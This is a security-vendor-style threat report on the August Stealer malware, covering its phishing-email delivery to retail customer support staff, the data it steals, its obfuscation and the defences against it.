Retail Support Systems are Targeted by August Stealer

Extremely sensitive and private information in on the target of August Stealer, a malicious fileless threat that is distributed with the help of misleading spam emails. If this malware manages to slither in without being detected, it can silently steal information and make it available for malicious cyber criminals. Needless to say, virtual privacy and financial security are on the line here. Unfortunately, this infection is silent, and it even employs another tool called “Confuser” to ensure that it remains out of sight. What does that mean? That means that this malware has a good chance of serving its purpose successfully without the victim even realizing it. Who is the target victim of this malware? That depends on the malicious party using the threat – and we discuss how multiple parties can be involved further in this report – but it appears that mostly companies who are dealing with customer support (including retail companies and manufacturers) are involved. That being said, everyone needs to be cautious because deleting August Stealer is much more difficult than protecting the system against it.

August Stealer is distributed using a highly clandestine technique. This fileless malware is downloaded using PowerShell when the target enables macros. Basically, the infection cannot just execute itself on the computer, and while it could be downloaded and executed by other infections that might be active on the system, it is likely that the target’s participation is usually required. So, how does it all work? The actor behind August Stealer creates a bogus email message that is specifically targeted at the customer support of a company. Let’s say, cyber criminals are targeting a major online goods store. To attract the attention of support, the subject line is created to look legitimate, such as “Need HELP with online order.” The message might reveal a fake problem that the bogus “customer” is dealing with, and a file attachment is appended to it. The message might indicate that the file explains the problem better, but emails with suspicious attachments should never be opened. They should be removed instead! If an email gateway security system is not set up, and the target opens the file, they are asked to enable macros/content, and that should NOT be done. If macros is enabled, August Stealer is automatically downloaded, and there is only so much time to delete this threat before it starts stealing information.Retail Support Systems are Targeted by August StealerRetail Support Systems are Targeted by August Stealer screenshot
Scroll down for full removal instructions

The malicious August Stealer can steal Bitcoin Wallet-related data stored in wallet.dat files and remote connection-related data stored in .RDP files, information from instant messaging applications (Pidgin Psi and Windows Live), email clients (Mozilla Thunderbird and MS Outlook 2013 and older), and FTP clients (CoreFTP, CuteFTP, FileZilla, SmartFTP, Total Commander, and WinSCP). It also can steal all data stored on these web browsers: Amigo, Bromium, Chromium, CoolNovo Browser, Comodo Coowon, Dooble, Google Chrome, IceDragon, Mail.Ru Browser, Mozilla Firefox, Opera, RockMelt Browser, SRWare Iron, Torch Browser, U Browser, Vivaldi Browser, Yandex. The cookies stored on these browsers, for example, can help cyber criminals obtain passwords and other user-related information. August Stealer can also steal personal files, which include documents. Ultimately, if one does not remove August Stealer in time, it can perform major identity theft. Of course, Confuser is used to ensure anti-debugging, anti-decompiling, anti-memory dumping, and other obfuscation methods, which ensures that the victim does not realize they need to delete this malicious infection.

Anyone who has 100 USD can purchase August Stealer to serve them because this fileless infection is available on the dark web, and it was found that it has been available for purchase since at least 2016. Unfortunately, it is unknown how many different parties might be using the stealer to gather information illegally. It is known that at least one other variant of this malware exists, and it is called “Vega Stealer.” Overall, this kind of malware exists, and many different variants could exist too, which is why it is extremely important to ensure that security measures are taken. As mentioned before, email gateway security systems can be helpful. Employing legitimate and trustworthy anti-malware software can be extremely helpful too. Of course, it is most important that targets themselves become more cautious. Keeping an eye on suspicious subject lines, email addresses, and email messages can help targets avoid malware invasion.

In non-techie terms:

August Stealer is an incredibly malicious and stealthy fileless infection that is being used to make way for malicious parties to steal all kinds of personal information. To slither in, the infection usually uses a misleading spam email with a corrupted Word document attachment, which, once opened, enables PowerShell to activate the threat. It then silently records passwords and usernames, and steals all kinds of files that store personal data. If this data falls into the wrong hands, the victim can experience major data theft and virtual impersonation. Since the stealer appears to be targeted at bigger companies at this point, the data that is available to cyber criminals is much more vast, and, in return, many more victims could emerge from that (for example, if the infection steals files that store personal customer information). Needless to say, appropriate security measures must be taken to ensure that the threat does not invade, but if it does, removing August Stealer is crucial, and the sooner that is done, the better.